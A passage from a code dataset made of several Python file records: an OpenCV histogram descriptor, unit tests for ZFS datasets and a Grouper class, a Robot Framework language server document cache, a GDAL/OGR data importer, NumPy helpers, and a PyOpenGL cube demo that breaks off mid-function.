-1)\n\n\n # extract a color histogram from the elliptical region and\n # update the feature vector\n hist = self.histogram(image, ellipMask)\n features.extend(hist)\n\n # return the feature vector\n return features\n\n def histogram(self, image, mask):\n # extract a 3D color histogram from the masked region of the\n # image, using the supplied number of bins per channel; then\n # normalize the histogram\n hist = cv2.calcHist([image], [0, 1, 2], mask, self.bins,\n [0, 180, 0, 256, 0, 256])\n hist = cv2.normalize(hist,hist).flatten()\n\n # return the histogram\n return hist","sub_path":"app/descriptor/colordescriptor.py","file_name":"colordescriptor.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112697662","text":"# Copyright (c) 2017-2019, Stefan Grönke\n# Copyright (c) 2014-2018, iocage\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted providing that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR\n# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\n# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING\n# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\"\"\"Unit tests for Datasets.\"\"\"\nimport pytest\nimport typing\nimport libzfs\n\nimport libioc.lib\n\n\nclass DatasetsMock(libioc.Datasets.Datasets):\n \"\"\"Mock the database.\"\"\"\n\n ZFS_POOL_ACTIVE_PROPERTY = \"org.freebsd.ioc-test:active\"\n\n\nclass TestDatasets(object):\n \"\"\"Run Datasets unit tests.\"\"\"\n\n @pytest.fixture\n def MockedDatasets(\n self,\n logger: 'libioc.Logger.Logger',\n pool: libzfs.ZFSPool\n ) -> typing.Generator[DatasetsMock, None, None]:\n \"\"\"Mock a dataset in a disabled pool.\"\"\"\n yield DatasetsMock # noqa: T484\n\n prop = DatasetsMock.ZFS_POOL_ACTIVE_PROPERTY\n pool.root_dataset.properties[prop].value = \"no\"\n\n def test_pool_can_be_activated(\n self,\n MockedDatasets: typing.Generator[DatasetsMock, None, None],\n pool: libzfs.ZFSPool,\n logger: 'libioc.Logger.Logger'\n ) -> None:\n \"\"\"Test if a pool can be activated.\"\"\"\n datasets = DatasetsMock(pool=pool, logger=logger)\n datasets.deactivate()\n datasets.activate(mountpoint=\"/iocage-test\")\n","sub_path":"tests/test_Datasets.py","file_name":"test_Datasets.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"46125625","text":"from operator import itemgetter\r\nimport unittest\r\n\r\nfrom grouper import Grouper\r\n\r\n\r\nclass GrouperTests(unittest.TestCase):\r\n\r\n \"\"\"Tests for Grouper.\"\"\"\r\n\r\n def test_test_tuples_of_strings(self):\r\n animals = [\r\n ('agatha', 'dog'),\r\n ('kurt', 'cat'),\r\n ('margaret', 'mouse'),\r\n ('cory', 'cat'),\r\n ('mary', 'mouse'),\r\n ]\r\n animals_by_type = {\r\n 'mouse': [('margaret', 'mouse'), ('mary', 'mouse')],\r\n 'dog': [('agatha', 'dog')],\r\n 'cat': [('kurt', 'cat'), ('cory', 'cat')],\r\n }\r\n groups = Grouper(animals, key=itemgetter(1))\r\n self.assertEqual(dict(groups), animals_by_type)\r\n\r\n def test_no_iterable_given(self):\r\n groups = Grouper(key=str.lower)\r\n self.assertEqual(dict(groups), {})\r\n\r\n def test_strings(self):\r\n words = [\"Apple\", \"animal\", \"apple\", \"ANIMAL\", \"animal\"]\r\n word_groups = {\r\n \"apple\": [\"Apple\", \"apple\"],\r\n \"animal\": [\"animal\", \"ANIMAL\", \"animal\"],\r\n }\r\n groups = Grouper(words, key=str.lower)\r\n self.assertEqual(dict(groups), word_groups)\r\n\r\n def test_containment(self):\r\n words = [\"Apple\", \"animal\", \"apple\", \"ANIMAL\", \"animal\"]\r\n groups = Grouper(words, key=str.lower)\r\n self.assertIn('apple', groups)\r\n\r\n def test_lookups(self):\r\n words = [\"Apple\", \"animal\", \"apple\", \"ANIMAL\", \"animal\"]\r\n groups = Grouper(words, key=str.lower)\r\n self.assertEqual(groups['apple'], [\"Apple\", \"apple\"])\r\n\r\n def test_init_accepts_mapping(self):\r\n dictionary = {\r\n \"apple\": [\"Apple\", \"apple\"],\r\n \"lemon\": [\"lemon\"],\r\n }\r\n groups = Grouper(dictionary, key=str.lower)\r\n self.assertEqual(dict(groups), dictionary)\r\n\r\n # To test the Bonus part of this exercise, comment out the following line\r\n # 
@unittest.expectedFailure\r\n def test_custom_update_method(self):\r\n words = [\"Apple\", \"animal\", \"apple\", \"ANIMAL\", \"animal\"]\r\n word_groups = {\r\n \"apple\": [\"Apple\", \"apple\", \"APPLE\", \"APPLE\"],\r\n \"animal\": [\"animal\", \"ANIMAL\", \"animal\"],\r\n \"lemon\": [\"lemon\", \"Lemon\", \"lemon\", \"LEMON\"],\r\n \"orange\": [\"Orange\"],\r\n }\r\n more_items = {\r\n \"apple\": [\"APPLE\"],\r\n \"lemon\": [\"lemon\", \"LEMON\"],\r\n \"orange\": [\"Orange\"],\r\n }\r\n groups = Grouper(words, key=str.lower)\r\n groups.update([\"lemon\", \"Lemon\", \"APPLE\"])\r\n groups.update(more_items)\r\n self.assertEqual(dict(groups), word_groups)\r\n\r\n # To test the Bonus part of this exercise, comment out the following line\r\n # @unittest.expectedFailure\r\n def test_add_and_group_for_methods(self):\r\n names = [\"Trey Hunner\", \"Monica Marshall\", \"Katherine Hunner\"]\r\n def last_name(name): return name.rsplit()[-1]\r\n name_groups = Grouper(names, key=last_name)\r\n self.assertEqual(name_groups.group_for(\"Rose Hunner\"), \"Hunner\")\r\n self.assertEqual(name_groups.group_for(\"Rose Klyce\"), \"Klyce\")\r\n self.assertEqual(\r\n name_groups['Hunner'],\r\n [\"Trey Hunner\", \"Katherine Hunner\"],\r\n )\r\n name_groups.add('Rose Hunner')\r\n self.assertEqual(\r\n name_groups['Hunner'],\r\n [\"Trey Hunner\", \"Katherine Hunner\", \"Rose Hunner\"],\r\n )\r\n name_groups.add(\"Rose Klyce\")\r\n self.assertEqual(name_groups['Klyce'], [\"Rose Klyce\"])\r\n\r\n # To test the Bonus part of this exercise, comment out the following line\r\n # @unittest.expectedFailure\r\n def test_adding_grouper_objects_together(self):\r\n words1 = [\"apple\", \"animal\", \"lemon\", \"ANIMAL\", \"Apple\"]\r\n words2 = [\"Lemon\", \"Animal\", \"Apple\", \"lemon\"]\r\n word_groups = {\r\n \"apple\": [\"apple\", \"Apple\", \"Apple\"],\r\n \"animal\": [\"animal\", \"ANIMAL\", \"Animal\"],\r\n \"lemon\": [\"lemon\", \"Lemon\", \"lemon\"],\r\n }\r\n groups1 = Grouper(words1, key=str.lower)\r\n groups2 = Grouper(words2, key=str.lower)\r\n self.assertEqual(dict(groups1 + groups2), word_groups)\r\n groups3 = Grouper(words2, key=str.upper)\r\n with self.assertRaises(ValueError):\r\n groups1 + groups3 # Can't concatenate groups with different keys\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main(verbosity=2)\r\n","sub_path":"morsels/20200316_grouper/test_grouper.py","file_name":"test_grouper.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"316604672","text":"from __future__ import annotations\n\nimport ast\nimport asyncio\nimport enum\nimport io\nimport weakref\nfrom typing import (\n TYPE_CHECKING,\n Any,\n Callable,\n Generator,\n Iterable,\n List,\n Optional,\n cast,\n)\n\nfrom ....utils.async_event import CancelationToken, async_tasking_event\nfrom ....utils.uri import Uri\nfrom ...common.parts.workspace import WorkspaceFolder\nfrom ...common.text_document import TextDocument\nfrom ..configuration import RobotConfig\nfrom ..diagnostics.imports_manager import ImportsManager\nfrom ..diagnostics.namespace import Namespace\nfrom ..utils.ast import Token\n\nif TYPE_CHECKING:\n from ..protocol import RobotLanguageServerProtocol\n\nfrom .protocol_part import RobotLanguageServerProtocolPart\n\n\nclass UnknownFileTypeError(Exception):\n pass\n\n\nclass DocumentType(enum.Enum):\n UNKNOWN = \"unknown\"\n GENERAL = \"robot\"\n RESOURCE = \"resource\"\n INIT = \"init\"\n\n\nclass 
DocumentsCache(RobotLanguageServerProtocolPart):\n def __init__(self, parent: RobotLanguageServerProtocol) -> None:\n super().__init__(parent)\n self._loop = asyncio.get_event_loop()\n\n self._imports_managers_lock = asyncio.Lock()\n self._imports_managers: weakref.WeakKeyDictionary[WorkspaceFolder, ImportsManager] = weakref.WeakKeyDictionary()\n self._default_imports_manager: Optional[ImportsManager] = None\n\n async def get_document_type(self, document: TextDocument) -> DocumentType:\n return await document.get_cache(self.__get_document_type)\n\n async def __get_document_type(self, document: TextDocument) -> DocumentType:\n path = document.uri.to_path()\n suffix = path.suffix.lower()\n\n if path.name == \"__init__.robot\":\n return DocumentType.INIT\n elif suffix == \".robot\":\n return DocumentType.GENERAL\n elif suffix == \".resource\":\n return DocumentType.RESOURCE\n else:\n return DocumentType.UNKNOWN\n\n async def get_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n return await document.get_cache(self.__get_tokens, cancelation_token)\n\n async def __get_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n document_type = await self.get_document_type(document)\n if document_type == DocumentType.INIT:\n return await self.get_init_tokens(document, cancelation_token)\n elif document_type == DocumentType.GENERAL:\n return await self.get_general_tokens(document, cancelation_token)\n elif document_type == DocumentType.RESOURCE:\n return await self.get_resource_tokens(document, cancelation_token)\n else:\n raise UnknownFileTypeError(str(document.uri))\n\n async def get_general_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n return await document.get_cache(self.__get_general_tokens, cancelation_token)\n\n async def __get_general_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n import robot.api\n\n def get(text: str, cancelation_token: CancelationToken) -> List[Token]:\n with io.StringIO(text) as content:\n return [e for e in robot.api.get_tokens(content) if not cancelation_token.throw_if_canceled()]\n\n return await self.__get_tokens_internal(document, get, cancelation_token)\n\n async def __get_tokens_internal(\n self,\n document: TextDocument,\n get: Callable[[str, CancelationToken], List[Token]],\n cancelation_token: Optional[CancelationToken] = None,\n ) -> List[Token]:\n try:\n if cancelation_token is None:\n cancelation_token = CancelationToken()\n return await asyncio.get_event_loop().run_in_executor(None, get, document.text, cancelation_token)\n except asyncio.CancelledError:\n if cancelation_token is not None:\n cancelation_token.cancel()\n raise\n\n async def get_resource_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n return await document.get_cache(self.__get_resource_tokens, cancelation_token)\n\n async def __get_resource_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n import robot.api\n\n def get(text: str, cancelation_token: CancelationToken) -> List[Token]:\n with io.StringIO(text) as content:\n return [e for e in robot.api.get_resource_tokens(content) if not cancelation_token.throw_if_canceled()]\n\n return await self.__get_tokens_internal(document, get, cancelation_token)\n\n async 
def get_init_tokens(\n        self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n    ) -> List[Token]:\n        return await document.get_cache(self.__get_init_tokens, cancelation_token)\n\n    async def __get_init_tokens(\n        self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n    ) -> List[Token]:\n        import robot.api\n\n        def get(text: str, cancelation_token: CancelationToken) -> List[Token]:\n            with io.StringIO(text) as content:\n                return [e for e in robot.api.get_init_tokens(content) if not cancelation_token.throw_if_canceled()]\n\n        return await self.__get_tokens_internal(document, get, cancelation_token)\n\n    async def get_model(self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None) -> ast.AST:\n        document_type = await self.get_document_type(document)\n\n        if document_type == DocumentType.INIT:\n            return await self.get_init_model(document, cancelation_token)\n        if document_type == DocumentType.GENERAL:\n            return await self.get_general_model(document, cancelation_token)\n        if document_type == DocumentType.RESOURCE:\n            return await self.get_resource_model(document, cancelation_token)\n        else:\n            raise UnknownFileTypeError(f\"Unknown file type '{document.uri}'.\")\n\n    async def __get_model(\n        self,\n        document: TextDocument,\n        tokens: Iterable[Any],\n        document_type: DocumentType,\n        cancelation_token: Optional[CancelationToken] = None,\n    ) -> ast.AST:\n        from robot.parsing.lexer import Token\n        from robot.parsing.parser.parser import _get_model\n\n        # Create a fresh cancelation token only when the caller did not supply one\n        # (same pattern as __get_tokens_internal above).\n        if cancelation_token is None:\n            cancelation_token = CancelationToken()\n\n        def get_tokens(_source: str, _data_only: bool = False) -> Generator[Token, None, None]:\n            for t in tokens:\n                if cancelation_token is not None:\n                    cancelation_token.throw_if_canceled()\n                yield t\n\n        try:\n            model = await asyncio.get_event_loop().run_in_executor(None, _get_model, get_tokens, document.uri.to_path())\n        except asyncio.CancelledError:\n            if cancelation_token is not None:\n                cancelation_token.cancel()\n            raise\n\n        setattr(model, \"source\", str(document.uri.to_path()))\n        setattr(model, \"model_type\", document_type)\n\n        return cast(ast.AST, model)\n\n    async def get_general_model(\n        self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n    ) -> ast.AST:\n        return await document.get_cache(self.__get_general_model, cancelation_token)\n\n    async def __get_general_model(\n        self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n    ) -> ast.AST:\n        return await self.__get_model(\n            document, await self.get_general_tokens(document), DocumentType.GENERAL, cancelation_token\n        )\n\n    async def get_resource_model(\n        self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n    ) -> ast.AST:\n        return await document.get_cache(self.__get_resource_model, cancelation_token)\n\n    async def __get_resource_model(\n        self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n    ) -> ast.AST:\n        return await self.__get_model(\n            document, await self.get_resource_tokens(document), DocumentType.RESOURCE, cancelation_token\n        )\n\n    async def get_init_model(\n        self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n    ) -> ast.AST:\n        return await document.get_cache(self.__get_init_model, cancelation_token)\n\n    async def __get_init_model(\n        self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n    ) -> ast.AST:\n        return await self.__get_model(\n            document, await self.get_init_tokens(document), 
DocumentType.INIT, cancelation_token\n )\n\n async def get_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await document.get_cache(self.__get_namespace, cancelation_token)\n\n async def __get_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await self.__get_namespace_for_document_type(document, None, cancelation_token)\n\n async def get_resource_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await document.get_cache(self.__get_resource_namespace, cancelation_token)\n\n async def __get_resource_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await self.__get_namespace_for_document_type(document, DocumentType.RESOURCE, cancelation_token)\n\n async def get_init_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await document.get_cache(self.__get_init_namespace, cancelation_token)\n\n async def __get_init_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await self.__get_namespace_for_document_type(document, DocumentType.INIT, cancelation_token)\n\n async def get_general_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await document.get_cache(self.__get_general_namespace, cancelation_token)\n\n async def __get_general_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await self.__get_namespace_for_document_type(document, DocumentType.GENERAL, cancelation_token)\n\n @async_tasking_event\n async def namespace_invalidated(sender, document: TextDocument) -> None:\n ...\n\n async def __invalidate_namespace(self, namespace: Namespace) -> None:\n document = namespace.document\n if document is not None:\n await document.remove_cache_entry(self.__get_namespace)\n await self.namespace_invalidated(self, document)\n\n async def __get_namespace_for_document_type(\n self,\n document: TextDocument,\n document_type: Optional[DocumentType],\n cancelation_token: Optional[CancelationToken] = None,\n ) -> Namespace:\n if document_type is not None and document_type == DocumentType.INIT:\n model = await self.get_init_model(document, cancelation_token)\n elif document_type is not None and document_type == DocumentType.RESOURCE:\n model = await self.get_resource_model(document, cancelation_token)\n elif document_type is not None and document_type == DocumentType.GENERAL:\n model = await self.get_general_model(document, cancelation_token)\n else:\n model = await self.get_model(document, cancelation_token)\n\n imports_manager = await self.get_imports_manager(document)\n\n def invalidate(namespace: Namespace) -> None:\n if self._loop.is_running():\n asyncio.create_task(self.__invalidate_namespace(namespace))\n\n return Namespace(imports_manager, model, str(document.uri.to_path()), invalidate, document)\n\n @property\n def default_imports_manager(self) -> ImportsManager:\n if self._default_imports_manager is None:\n self._default_imports_manager = ImportsManager(\n self.parent,\n Uri(self.parent.workspace.root_uri or \".\"),\n RobotConfig(args=(), python_path=[], env={}, variables={}),\n )\n return self._default_imports_manager\n\n async 
def get_imports_manager(self, document: TextDocument) -> ImportsManager:\n folder = self.parent.workspace.get_workspace_folder(document.uri)\n if folder is None:\n return self.default_imports_manager\n\n async with self._imports_managers_lock:\n if folder not in self._imports_managers:\n config = await self.parent.workspace.get_configuration(RobotConfig, folder.uri)\n\n self._imports_managers[folder] = ImportsManager(self.parent, folder.uri, config)\n return self._imports_managers[folder]\n","sub_path":"robotcode/language_server/robotframework/parts/documents_cache.py","file_name":"documents_cache.py","file_ext":"py","file_size_in_byte":13409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244742936","text":"import os\nimport ogr\nimport osr\nimport gdal\nfrom .inspectors import GDALInspector, OGRInspector\nfrom .utils import FileTypeNotAllowed, GdalErrorHandler, load_handler, launder, increment\nfrom .handlers import IMPORT_HANDLERS\nfrom django import db\n\nogr.UseExceptions()\n\n\nclass Import(object):\n _import_handlers = []\n handler_results = []\n file_extensions = ['shp', 'zip']\n\n def filter_handler_results(self, handler_name):\n return filter(lambda results: handler_name in results.keys(), self.handler_results)\n\n def _initialize_handlers(self):\n self._import_handlers = [load_handler(handler, self)\n for handler in IMPORT_HANDLERS]\n\n @property\n def import_handlers(self):\n \"\"\"\n Initializes handlers and/or returns them.\n \"\"\"\n if not self._import_handlers:\n self._initialize_handlers()\n\n return self._import_handlers\n\n def import_file(self, filename, **kwargs):\n raise NotImplementedError\n\n def file_extension_not_allowed(self, request, *args, **kwargs):\n raise FileTypeNotAllowed\n\n def handle(self, configuration_options, *args, **kwargs):\n \"\"\"\n Executes the entire import process.\n 1) Imports the dataset from the source dataset to the target.\n 2) Executes arbitrary handlers that can modify the data set.\n 3) Executes arbitrary publish handlers to publish the data set.\n \"\"\"\n\n layers = self.import_file(configuration_options=configuration_options)\n\n for layer, config in layers:\n config['handler_results'] = self.run_import_handlers(layer, config)\n\n return layers\n\n def run_import_handlers(self, layer, layer_config, *args, **kwargs):\n \"\"\"\n Handlers that are run on each layer of a data set.\n \"\"\"\n self.handler_results = []\n\n for handler in self.import_handlers:\n self.handler_results.append({type(handler).__name__ : handler.handle(layer, layer_config, *args, **kwargs)})\n\n return self.handler_results\n\n\nclass GDALImport(Import):\n\n source_inspectors = [GDALInspector]\n target_inspectors = [OGRInspector]\n\n def __init__(self, filename, target_store=None):\n self.file = filename\n self.completed_layers = []\n\n if target_store is None:\n d = db.connections['datastore'].settings_dict\n connection_string = \"PG:dbname='%s' user='%s' password='%s' host='%s' port='%s'\" % (d['NAME'], d['USER'],\n d['PASSWORD'],\n d['HOST'], d['PORT'])\n self.target_store = connection_string\n\n def open_datastore(self, connection_string, inspectors, *args, **kwargs):\n \"\"\"\n Opens the source source data set using GDAL.\n \"\"\"\n\n for inspector in inspectors:\n data = inspector(connection_string, *args, **kwargs).open()\n if data is not None:\n return data\n\n def open_source_datastore(self, connection_string, *args, **kwargs):\n \"\"\"\n Opens the source source data set using GDAL.\n \"\"\"\n\n 
return self.open_datastore(connection_string, self.source_inspectors, *args, **kwargs)\n\n def open_target_datastore(self, connection_string, *args, **kwargs):\n \"\"\"\n Opens the target data set using OGR.\n \"\"\"\n\n return self.open_datastore(connection_string, self.target_inspectors, *args, **kwargs)\n\n def create_target_dataset(self, target_datastore, layer_name, *args, **kwargs):\n \"\"\"\n Creates the data source in the target data store.\n \"\"\"\n return target_datastore.CreateLayer(layer_name, *args, **kwargs)\n\n def get_layer_type(self, layer, source):\n \"\"\"\n A hook for returning the GeometryType of a layer.\n\n This is work around for a limitation of the Shapefile: when reading a Shapefile of type\n SHPT_ARC, the corresponding layer will be reported as of type wkbLineString, but depending on the number\n of parts of each geometry, the actual type of the geometry for each feature can be either OGRLineString\n or OGRMultiLineString. The same applies for SHPT_POLYGON shapefiles, reported as layers of type wkbPolygon,\n but depending on the number of parts of each geometry, the actual type can be either OGRPolygon or\n OGRMultiPolygon.\n \"\"\"\n if source.GetDriver().ShortName == 'ESRI Shapefile':\n geom_type = layer.GetGeomType()\n\n # If point return MultiPoint\n if geom_type == 1:\n return 4\n\n # If LineString return MultiLineString\n if geom_type == 2:\n return 5\n\n # if Polygon return MutliPolygon\n if geom_type == 3:\n return 6\n\n return layer.GetGeomType()\n\n def import_file(self, *args, **kwargs):\n \"\"\"\n Loads data that has been uploaded into whatever format we need for serving.\n \"\"\"\n filename = self.file\n self.completed_layers = []\n err = GdalErrorHandler()\n gdal.PushErrorHandler(err.handler)\n configuration_options = kwargs.get('configuration_options', [{'index': 0}])\n\n # Configuration options should be a list at this point since the importer can process multiple layers in a\n # single import\n if isinstance(configuration_options, dict):\n configuration_options = [configuration_options]\n\n data = self.open_source_datastore(filename, *args, **kwargs)\n target_file = self.open_target_datastore(self.target_store)\n\n target_create_options = []\n\n # Prevent numeric field overflow for shapefiles https://trac.osgeo.org/gdal/ticket/5241\n if target_file.GetDriver().GetName() == 'PostgreSQL':\n target_create_options.append('PRECISION=NO')\n\n for layer_options in configuration_options:\n layer = data.GetLayer(layer_options.get('index'))\n layer_name = layer_options.get('name', layer.GetName().lower())\n layer_type = self.get_layer_type(layer, data)\n srs = layer.GetSpatialRef()\n\n if layer_name == 'ogrgeojson':\n try:\n layer_name = os.path.splitext(os.path.basename(filename))[0].lower()\n except IndexError:\n pass\n\n layer_name = launder(str(layer_name))\n\n # default the layer to 4326 if a spatial reference is not provided\n if not srs:\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(4326)\n\n n = 0\n while True:\n n += 1\n try:\n target_layer = self.create_target_dataset(target_file, layer_name, srs,\n layer_type, options=target_create_options)\n except RuntimeError as e:\n # the layer already exists in the target store, increment the name\n if 'Use the layer creation option OVERWRITE=YES to replace it.' 
in str(e):\n                        layer_name = increment(layer_name)\n\n                        # try 100 times to increment then break\n                        if n >= 100:\n                            break\n\n                        continue\n                    else:\n                        raise e\n                break\n\n            # adding fields to new layer\n            layer_definition = ogr.Feature(layer.GetLayerDefn())\n\n            for i in range(layer_definition.GetFieldCount()):\n                target_layer.CreateField(layer_definition.GetFieldDefnRef(i))\n\n            for i in range(0, layer.GetFeatureCount()):\n                feature = layer.GetFeature(i)\n\n                if feature:\n                    if feature.geometry().GetGeometryType() != target_layer.GetGeomType() and \\\n                            target_layer.GetGeomType() in range(4, 7):\n\n                        conversion_function = ogr.ForceToMultiPolygon\n\n                        if target_layer.GetGeomType() == 5:\n                            conversion_function = ogr.ForceToMultiLineString\n\n                        elif target_layer.GetGeomType() == 4:\n                            conversion_function = ogr.ForceToMultiPoint\n\n                        geom = ogr.CreateGeometryFromWkb(feature.geometry().ExportToWkb())\n                        feature.SetGeometry(conversion_function(geom))\n                    target_layer.CreateFeature(feature)\n\n            self.completed_layers.append([target_layer.GetName(), layer_options])\n\n        return self.completed_layers\n","sub_path":"mapstory/importer/importers.py","file_name":"importers.py","file_ext":"py","file_size_in_byte":8790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"22301284","text":"import math\nimport numpy as np\n\n\ndef normal_d(size = 20, k = 0.95):\n    \"\"\"\n    Returns normal distribution NumPy array.\n    \"\"\"\n\n    default_size = 15.\n    f_size = float(size)\n\n    x = np.linspace(int(-size / 2), int(size / 2), size)\n\n    # Calculate ND\n    u = 0\n    m = default_size / f_size\n    q = np.sqrt(5.)\n\n    return (k * 6 / (q * np.sqrt(2 * math.pi))) * np.power(math.e, -0.5 * ((x * m - u)/q)**2)\n\n\ndef insert_np(n_array, target, start = 0):\n    \"\"\"\n    Inserts NumPy 1d array into target 1d array from starting position, treats out of bounds correctly.\n    \"\"\"\n    if start > target.shape[0]:\n        return\n\n    # Target start/end\n    start_t = start\n    end_t = start + n_array.shape[0]\n\n    start_i = 0\n    if start < 0:\n        start_i = -start\n        start_t = 0\n\n    if start_i > n_array.shape[0]:\n        return\n\n    end_i = n_array.shape[0]\n    if end_t > target.shape[0]:\n        end_i = n_array.shape[0] - (end_t - target.shape[0])\n        end_t = target.shape[0]\n\n    if end_i <= 0:\n        return\n\n    target[start_t : end_t] = n_array[start_i : end_i]\n\n    return target\n","sub_path":"utils/math_helper.py","file_name":"math_helper.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"633874736","text":"import contextlib\r\nwith contextlib.redirect_stdout(None):\r\n    import pygame, sys\r\nfrom pygame.locals import *\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLU import *\r\n\r\nclock = pygame.time.Clock()\r\nwidth, height = 1280, 720\r\npygame.init()\r\npygame.display.set_mode([width, height], DOUBLEBUF|OPENGL)\r\ngluPerspective(75, width/height, 0.1, 1000)  # zNear must be > 0 for a valid projection matrix\r\n\r\nedges = ((0,1),(0,3),(0,4),(2,1),(2,3),(2,7),(6,3),(6,4),(6,7),(5,1),(5,4),(5,7))\r\nsurfaces = ((0,1,2,3),(3,2,7,6),(6,7,5,4),(4,5,1,0),(1,5,7,2),(4,0,3,6))\r\nverticies=((1, 0, 0), (1, 1, 0), (0, 1, 0), (0, 0, 0), (1, 0, 1), (1, 1, 1), (0, 0, 1), (0, 1, 1))\r\nground_vertices=((-50,-0.1,50),(-50,-0.1,-50),(50,-0.1,-50),(50,-0.1,50),)\r\nsky_surfaces = ((0,1,2,3),(3,2,7,6),(6,7,5,4),(4,5,1,0),(1,5,7,2),(4,0,3,6))\r\n\r\nlook_up, look_down, look_left, look_right = False, False, False, False\r\npitch, yaw = 0, 0\r\n\r\ngrass = (0.21,0.41,0.18)\r\nsky = (0.22, 0.69, 0.87)\r\n\r\nclass Cube:\r\n    def 
__init__(self, position, verticies, interactable = False, colour = (160, 0, 240)):\r\n self.position = position\r\n self.verticies = verticies\r\n self.interactable = interactable\r\n self.colour = colour\r\n def wireframe(self):\r\n glBegin(GL_LINES)\r\n offset = 0.5\r\n for edge in edges:\r\n for vertex in edge:\r\n glColor3fv(self.colour)\r\n glVertex3fv((self.position[0] - self.verticies[vertex][0] + offset, self.position[1] - self.verticies[vertex][1] + offset, self.position[2] - self.verticies[vertex][2] + offset))\r\n glEnd()\r\n def draw(self):\r\n glBegin(GL_QUADS)\r\n offset = 0.5\r\n for surface in surfaces:\r\n for vertex in surface:\r\n glColor3fv(self.colour)\r\n glVertex3fv((self.position[0] - self.verticies[vertex][0] + offset, self.position[1] - self.verticies[vertex][1] + offset, self.position[2] - self.verticies[vertex][2] + offset))\r\n glEnd() \r\n\r\ndef ground():\r\n glBegin(GL_QUADS)\r\n for vertex in ground_vertices:\r\n glColor3fv(grass)\r\n glVertex3fv((vertex[0],vertex[1]-0.5,vertex[2]))\r\n glEnd()\r\n\r\ndef skybox():\r\n global verticies\r\n glBegin(GL_QUADS)\r\n for surface in sky_surfaces:\r\n for vertex in surface:\r\n glColor3fv(sky)\r\n glVertex3fv((0.5 - verticies[vertex][0], 0.5 - verticies[vertex][1], 0.5 - verticies[vertex][2]))\r\n glEnd()\r\n\r\ndef events():\r\n global look_up, look_down, look_left, look_right\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == K_UP:\r\n look_up = True\r\n if event.key == K_DOWN:\r\n look_down = True\r\n if event.key == K_LEFT:\r\n look_left = True\r\n if event.key == K_RIGHT:\r\n look_right = True\r\n if event.type == pygame.KEYUP:\r\n if event.key == K_UP:\r\n look_up = False\r\n if event.key == K_DOWN:\r\n look_down = False\r\n if event.key == K_LEFT:\r\n look_left = False\r\n if event.key == K_RIGHT:\r\n look_right = False\r\n\r\ndef rotate_camera():\r\n global look_up, look_down, look_left, look_right, pitch, yaw\r\n if yaw < 0: 